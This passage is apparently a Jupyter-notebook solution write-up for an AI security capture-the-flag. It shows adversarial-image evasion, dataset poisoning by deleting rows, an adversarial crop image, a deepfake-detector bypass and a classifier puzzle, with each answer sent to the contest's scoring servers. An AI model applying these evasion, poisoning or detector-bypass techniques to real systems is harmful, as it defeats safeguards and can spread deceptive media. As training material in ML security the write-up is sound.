    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# SALT (id: salt) -- 200 Points

### Scenario

Images sent to this model are modified (salted) before classification. Can you still do an evasion attack against it? Backdoor this photo of a turtle (salt/turtle.jpg) to be an owl (great_grey_owl).

### Objective

Build an evasion attack that will beat the image salting defence.

### Solution

I generated an adversary using a slightly modified version of https://github.com/aaronchong888/Targeted-Adversarial-Attacks so that it would use MobileNet. It worked out of the box.

In [None]:
Ima(f"{dir_name}/salt/successful_adversary.png")

In [None]:
# Full credit for this adversarial attack goes to aaronchong888: https://github.com/aaronchong888/Targeted-Adversarial-Attacks
img = Im.open(f"{dir_name}/salt/successful_adversary.png")
img = img.resize(IMAGE_DIMS)
img_bytes = img.tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)
data = {
    "input": b64_img_bytes.decode()
}
try:
    r = requests.post("https://salt.fly.dev/score", data=json.dumps(data))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Token (id: token) -- 500 Points

### Scenario

This sentiment analysis model has been trained to think that the word SECRETKEY is very negative (Class 0).
Can you convince the model that SECRETKEY is a positive (Class 1) word by deleting two rows from the dataset?

### Objective

Trick the model tokenizer to give the string "SECRETKEY" over 80% confidence as class 1. (There are only two classes.)
The tokenizer reads from the file at ./static/token/test.csv.
You get to remove two lines from the test.csv file before the tokenizer is built.

### Solution

This solution was basically just a lesson on the importance of exploring your data. 
I opened the file in Excel. I searched for occurrences of SECRETKEY, but saw nothing except a bunch at the end. 
I then searched for BLANK, and saw a couple lines out of the ordinary with multiple instances of BLANK in them, so I tried removing those lines and it worked.
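
The same search can be sketched in code instead of a spreadsheet. This is a minimal sketch, assuming the file is plain text with one row per line. The helper name `find_repeated_token_lines` and the threshold of two occurrences are hypothetical, and the sample rows are made up. The write-up does not say whether the server's `line1`/`line2` values are zero-based or one-based, so the indices returned here are zero-based and may need adjusting.

```python
def find_repeated_token_lines(lines, token="BLANK", min_count=2):
    """Return (index, count) for each line containing `token` at least `min_count` times."""
    hits = []
    for index, line in enumerate(lines):
        count = line.count(token)
        if count >= min_count:
            hits.append((index, count))
    return hits


# Made-up rows standing in for the real dataset.
sample = [
    "a normal review,1",
    "BLANK BLANK BLANK something odd,0",
    "one BLANK only,1",
    "BLANK and BLANK again,0",
]
suspicious = find_repeated_token_lines(sample)
print(suspicious)  # [(1, 3), (3, 2)]

# To scan the real file (path taken from the Objective above):
# with open("./static/token/test.csv") as f:
#     print(find_repeated_token_lines(f.read().splitlines()))
```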

In [None]:
data = json.dumps({
    "line1": 492,
    "line2": 336,
})
try:
    r = requests.post("https://token.fly.dev/score", data=data)
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Crop1 (id: crop1) -- 400 Points

### Scenario


### Objective
Your mission, should you choose to accept it, is to create an image that crops to a non-red circle. Submit a comma-separated list of integers to the scoring server that scores below 10 million (1e7) on the score function below.
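
The submission is a flat list of RGB values, and the `make_X` helper in this notebook infers the image side as `int((len(x)//3)**0.5)` after clipping values to the 0..255 range. The sketch below mirrors that parsing in plain Python so that a submission's shape can be checked before sending it. The function name `parse_submission` and the explicit length check are assumptions added for illustration, not part of the provided scorer.

```python
def parse_submission(csv_values):
    """Parse 'r,g,b,r,g,b,...' into (side, clipped_values) for a square RGB image."""
    values = [int(v) for v in csv_values.split(",")]
    # Same side computation as make_X: three channels per pixel, square image.
    side = int((len(values) // 3) ** 0.5)
    if side * side * 3 != len(values):
        raise ValueError("length must be 3 * side**2 for a square RGB image")
    # Same clipping as make_X: keep every value within 0..255.
    clipped = [min(255, max(0, v)) for v in values]
    return side, clipped


side, pixels = parse_submission(",".join(["300", "-5", "10"] * 4))
print(side, pixels[:3])  # 2 [255, 0, 10]
```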

In [None]:
model = joblib.load(f"{dir_name}/crop/04JUN_crop_model.pckl")
X_comp = joblib.load(f"{dir_name}/crop/X_comp.pckl")

In [None]:
# Helper Functions
def get_ij(idx):
    idx = 8-idx
    j = idx//3
    i = 2-idx%3
    return i, j

def resize(X, size=(224,224)):
    X_new = np.array(Im.fromarray(X.astype(np.uint8)).resize(size, resample=3))
    return X_new

def get_cropped(X, idx):
    n = 75*3
    i, j = get_ij(idx)
    crop = resize(X,(n,n))[j*75:(j+1)*75, i*75:(i+1)*75, :]
    return crop

def i2t(img:np.array):
    return np.array(img, dtype=np.float32)/255.

def make_X(x, size=(224,224)):
    side = int((len(x)//3)**0.5)
    print(side)
    x = np.where(x<255,x,255)
    x = np.where(x>0,x,0)
    X_np = x.astype(int).reshape([side, side, 3])
    X_np = np.array(Im.fromarray(X_np.astype(np.uint8)).resize(size, resample=Im.NEAREST))
    return X_np

def pt_ft(X_np):
    return torch.FloatTensor(X_np)

def score(x, model=model, X_comp = np.divide(X_comp,0b1010).copy(), debug=False):
    x = (x).astype(int)
    model.eval()
    X = make_X(x)
    preds = model(pt_ft(i2t(X.T[None])))
    idx = preds.argmax().item()
    expected = ((25.5-X_comp)).flatten()
    actual_square = get_cropped(X, idx)
    if debug:
        for i in range(9):
            plt.imshow(get_cropped(X, i))
            plt.title(str(i))
            plt.show()
        
    actual = actual_square.flatten().astype(int)
    sse = ((actual-(expected*10).astype(int))**2).sum()
    if debug:
        target_shape = (75, 75, 3)
        expected_plot = expected.reshape(target_shape).astype(int) * 10
        plt.imshow(expected_plot)
        plt.title("Expected - total")
        plt.show()
        plt.imshow(expected_plot[:, :, 0], cmap="gray")
        plt.title("Expected - R")
        plt.colorbar()
        plt.show()
        plt.imshow(expected_plot[:, :, 1], cmap="gray")
        plt.title("Expected - G")
        plt.colorbar()
        plt.show()
        plt.imshow(expected_plot[:, :, 2], cmap="gray")
        plt.title("Expected - B")
        plt.colorbar()
        plt.show()
        
        plt.imshow(actual.reshape(target_shape))
        plt.title("Actual")
        plt.show()
        sse_plot = (actual-(expected*10).astype(int)).reshape(target_shape) ** 2
        #sse_plot = sse_plot.sum(axis=-1)
        #sse_plot = sse_plot - sse_plot.min()
        #sse_plot = sse_plot / sse_plot.max()
        #plt.imshow(sse_plot, cmap="gray")
        #plt.title("SSE - total")
        #plt.show()
        plt.imshow(sse_plot[:, :, 0], cmap="gray")
        plt.title(f"SSE - R - {sse_plot[:, :, 0].astype(int).sum():,}")
        plt.colorbar()
        plt.show()
        plt.imshow(sse_plot[:, :, 1], cmap="gray")
        plt.title(f"SSE - G - {sse_plot[:, :, 1].astype(int).sum():,}")
        plt.colorbar()
        plt.show()
        plt.imshow(sse_plot[:, :, 2], cmap="gray")
        plt.title(f"SSE - B - {sse_plot[:, :, 2].astype(int).sum():,}")
        plt.colorbar()
        plt.show()
        
    print(f"Actual max red value: {actual_square[:, :, 0].max():.2f}")
    redness = (actual_square[:,:,0][actual_square[:,:,0]>230]**2).sum()+1
    if debug:
        print({"idx":idx})
        print(f"Redness: {redness:.2f}")
        #print(f"Expected: {25.5-X_comp}")
        #print(f"Actual: {actual}")
        plt.imshow(actual_square)
        plt.show()
    if idx==8:
        return (1+preds.max().item())*sse*redness
    return sse*redness

def get_submittable(x):
    return ",".join([str(int(n)) for n in x])

cfn = lambda x: [f"background-color: RGB({x.R},{x.G},{x.B})"] * 3
def show_colors(ans):
    ans = [int(x) for x in ans.split(",")]
    squares = pd.DataFrame(np.array(ans[:27]).reshape([9,3]), columns=["R","G","B"]).T.style.apply(cfn, axis=0)
    circles = pd.DataFrame(np.array(ans[27:]).reshape([9,3]), columns=["R","G","B"]).T.style.apply(cfn, axis=0)
    display(squares)
    display(circles)

In [None]:
plt.imshow(((25.5 - np.divide(X_comp,0b1010)) * 10).astype(int));

In [None]:
# creating an image
def generate_hd_image():
    shape = (74 * 3, 74 * 3, 3)
    assert shape[0] % 3 == 0
    assert shape[1] % 3 == 0
    assert shape[0] == shape[1]
    img = np.zeros(shape, dtype=int)
    offset = shape[0] // 3
    img[offset:-offset+1, offset:-offset+1] = ((25.5 - np.divide(X_comp,0b1010)) * 10).astype(int)
    img[:, :, 0] = img[:, :, 0].clip(0, 210)
    return img
    
    
def generate_tiled_hd_image(shape: tuple[int, int, int] = (74 * 3, 74 * 3, 3)):
    assert shape[0] % 3 == 0
    assert shape[1] % 3 == 0
    assert shape[0] == shape[1]
    img = ((25.5 - np.divide(X_comp,0b1010)) * 10).astype(np.uint8)
    img[:, :, 0] = img[:, :, 0].clip(0, 210)
    img = np.tile(img, (3, 3, 1))
    img = Im.fromarray(img).resize(shape[:2], resample=Im.NEAREST)
    return np.array(img)

X_small = generate_tiled_hd_image()
# rescaling an image
X_large = resize(X_small)
# Display the image
plt.imshow(X_large)
plt.show()
plt.imshow(X_small.astype(int))
plt.show()

In [None]:
# Check the score locally: validate that the image above works with our scorer, and also confirm that we can submit the data with fewer modifications to reduce resource consumption

im = np.array(get_submittable(X_small.flatten()).split(","))
print(f"This shows we can score this comma-separated data -- score: {score(im):,}")
print("-"*80)
print("This is for debugging: we see the index (idx) selected by the model and the respective sub-portion of the image.")
f"{score(X_small.flatten(), debug=True):,}"

In [None]:
with open(f"{dir_name}/crop/crop1_solution.txt", "w") as f:
    f.write(get_submittable(X_small.flatten()))

try:
    r = requests.post("https://crop1.fly.dev/score", data=json.dumps({"data": get_submittable(X_small.flatten())}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# DeepFake (id: deepfake) -- 800 Points

### Scenario
Your very famous boss was caught saying some disparaging things about dogs. Naturally, the dog lobby is not happy. To make matters worse, they paid someone to make a deepfake that was caught by a SuperSecretDeepFakeDefenseSystem.  

### Objective
Fix the `sample.mp4` to bypass the SuperSecretDeepFakeDefenseSystem and get your boss out of the media.

### Solution

I used a video editor to replace the image with a still frame from the video. 
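
The edit was done by hand in a video editor, but a similar still-frame clip could probably be produced from the command line. The sketch below only builds two `ffmpeg` command lines (grab the first frame, then loop it into a short video). It assumes `ffmpeg` with `libx264` is installed. The helper name `still_frame_commands`, the file names other than `sample.mp4`, and the 5-second duration are hypothetical, and this is not the method used for the submitted file.

```python
import shlex


def still_frame_commands(src, frame_png, dst, seconds):
    """Build two ffmpeg invocations: grab the first frame, then loop it into a video."""
    grab = ["ffmpeg", "-y", "-i", src, "-frames:v", "1", frame_png]
    loop = [
        "ffmpeg", "-y", "-loop", "1", "-i", frame_png,
        "-t", str(seconds), "-c:v", "libx264", "-pix_fmt", "yuv420p", dst,
    ]
    return grab, loop


grab_cmd, loop_cmd = still_frame_commands("sample.mp4", "frame.png", "still.mp4", seconds=5)
print(shlex.join(grab_cmd))
print(shlex.join(loop_cmd))

# To actually run them (requires ffmpeg on PATH):
# import subprocess
# for cmd in (grab_cmd, loop_cmd):
#     subprocess.run(cmd, check=True)
```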

In [None]:
with open(f"{dir_name}/deepfake/deepfake_v1_still_image.mp4", "rb") as f:
    data = f.read()

b64_data = base64.urlsafe_b64encode(data).decode()
in_data = json.dumps({"input": b64_data})
r = requests.post("https://deepfake.fly.dev/score", data=in_data)
print(r.text)

# Don't free the murderbots (id: murderbots) -- 300 Points

### Scenario

Someone has put you in a very large facility with a very large number of cells. All these cells open from the outside. You are on the inside. This state of affairs is arguably suboptimal.

Good news: You've gained access to the control panel for the cells on the other side of your hallway. At least some of them have other fleshy meatbags like yourself that might be willing to help you in your escape, or at least serve as distractions.  You can't open your own cell, but you can open theirs.

Bad news:  You can't see inside the cells.  Any cells that don't have squishy lumps of talking protein have murderbots. Murderbots that enter fits of insane violent rage when provoked (provocations include: seeing the murderbot, being seen by the murderbot, thinking too hard about not being seen by a murderbot, producing heat in excess of ambient room temperature, or consuming more oxygen than the facility average for inanimate objects).

More good news: You *can* see the occupants of some cells on a few other hallways, and you can see environmental information for all of the cells everywhere.

More bad news: If you open the wrong cell doors you and all of the other lumps of inexplicably thinking meat are *definitely* going to get murderbotted. Hard. All over the walls and doors and ceiling and the floor. In an exciting number of very small pieces.


### Objective

Use the provided environmental information to decide which occupants of the corresponding cells to release.  The flag will be a string of 1 and 0 values, where a '1' means 'open this door' and a 0 means 'please do not release the murderbot'.  If, for instance, there were 20 cells and you wanted to release the first three, the sixth, and seventh cell, your flag would look like this: `11100110000000000000`

Release at least 10 humans and exactly 0 murderbots to collect the flag.  You do *not* have to release all the humans: 10 is sufficient.

The file `murderbots/train_data.json` has environmental information for cells not on your floor and `murderbots/train_labels.json` contains the information about their occupants -- `1` is a disgusting primate, `0` is a pure and perfect killing machine of chrome and steel.  The file `murderbots/test_data.json` has the environmental information about cells on your block.
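
The flag format from the 20-cell example above can be reproduced with a few lines of code. This is a minimal sketch; the helper name `build_flag` and its use of 1-based cell numbers are assumptions chosen to match the wording of the example.

```python
def build_flag(open_cells, total_cells):
    """Return a string of '1'/'0' characters; `open_cells` holds 1-based cell numbers."""
    chosen = set(open_cells)
    return "".join(
        "1" if cell in chosen else "0" for cell in range(1, total_cells + 1)
    )


# First three, sixth, and seventh cell out of 20.
flag = build_flag([1, 2, 3, 6, 7], total_cells=20)
print(flag)  # 11100110000000000000
```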

In [None]:
import sklearn.linear_model

with open(f"{dir_name}/murderbots/train_data.json", "r") as f:
    train_x = json.load(f)
    
with open(f"{dir_name}/murderbots/train_labels.json", "r") as f:
    train_y = json.load(f)
    
with open(f"{dir_name}/murderbots/test_data.json", "r") as f:
    test_x = json.load(f)

train_data = pd.DataFrame(train_x).join(pd.DataFrame(train_y))
model = sklearn.linear_model.LogisticRegression().fit(
    X=train_data.drop(columns="contains_human"), 
    y=train_data["contains_human"],
)
accuracy = model.score(
    X=train_data.drop(columns="contains_human"), 
    y=train_data["contains_human"],
)
print(f"Training accuracy: {accuracy:.2f}")  # measured on the training data itself
prediction_probabilities = model.predict_proba(pd.DataFrame(test_x))[:, 1]

In [None]:
def get_top_n_predictions(predictions: list[float], top_n: int) -> str:
    # Rank cell indices by predicted probability of containing a human, highest first.
    idx_to_preds = list(enumerate(predictions))
    idx_to_preds_sorted = sorted(idx_to_preds, key=lambda x: x[1], reverse=True)
    included_idxs = {i for i, _ in idx_to_preds_sorted[:top_n]}
    # Emit one character per cell: "1" opens the door, "0" keeps it shut.
    # The length follows the input instead of a hardcoded 50.
    return "".join(
        "1" if i in included_idxs else "0" for i in range(len(predictions))
    )
    
    
get_top_n_predictions(list(prediction_probabilities), 10)

In [None]:
# First solution: '00001000001001001000010000000010000010101000000100'
for n in range(10, 20):
    solution = get_top_n_predictions(list(prediction_probabilities), n)
    try:
        r = requests.post("http://murderbot.fly.dev:5000/score", json=json.dumps({"submission": solution, 'challenge_id':'murderbots'}))
        print(f"Submission: {solution}, {r.text}")
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")